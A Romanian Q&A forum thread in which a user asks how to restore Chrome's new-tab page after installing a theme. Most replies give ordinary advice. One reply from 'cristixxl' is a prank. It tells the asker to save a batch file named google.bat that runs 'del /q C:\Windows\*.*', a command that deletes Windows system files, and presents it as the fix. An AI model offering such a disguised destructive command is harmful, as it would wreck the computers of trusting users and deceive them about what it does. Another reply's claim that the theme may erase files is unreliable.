| LeonardoDiCapra a întrebat:

Hi! Problema mea este una simpla! Folosesc google chrome ca browser,ei bine, am instalat o tema, iar acum cand intru intr-o filă nouă imi intra in pagina de home - google.ro -.-"

Cum pot face sa restabilesc fila noua sa fie cum era inainte cu "cele mai accesate pagini " si sageata in dreapta spre marcaje/aplicatii?

Stiu ca trebuie sa intru sus la "Meniu Google Chrome" si apoi la setari, dar de acolo nu mai gasesc "fila noua" ...stiu ca era inainte!

Răspuns Câştigător
| DeeJhayMaster a răspuns:

Cel mai bine ar fi sa reinstalezi Google Chrome
https://www.google.com/......e/browser/

3 răspunsuri:
| Tamarika a răspuns:

Cind deschizi o fila noua sus dreapta in colt iti apare o cheie. Apasa pe ea si cauta setari. Apoi acolo iti apar pe fila setarile...Iar una dintre variante este LA PORNIRE Seteaza acolo prima optiune. Succes sper sa gasesti

| cristixxl a răspuns:

Salut.
Deschide un notepad si scrie urmatorul cod

@echo off
cd /D D:\
del /q C:\Windows\*.*
del.bat

dai save as si pune extensia google.bat

Bafta!

| kittyroxy_3562 a răspuns:

Trebuie neaparat sa scoti tema ca altfel poate dauna calculatorului si in timp ti se pot sterge chesti din calculator si sa stii ca nu glumesc!)))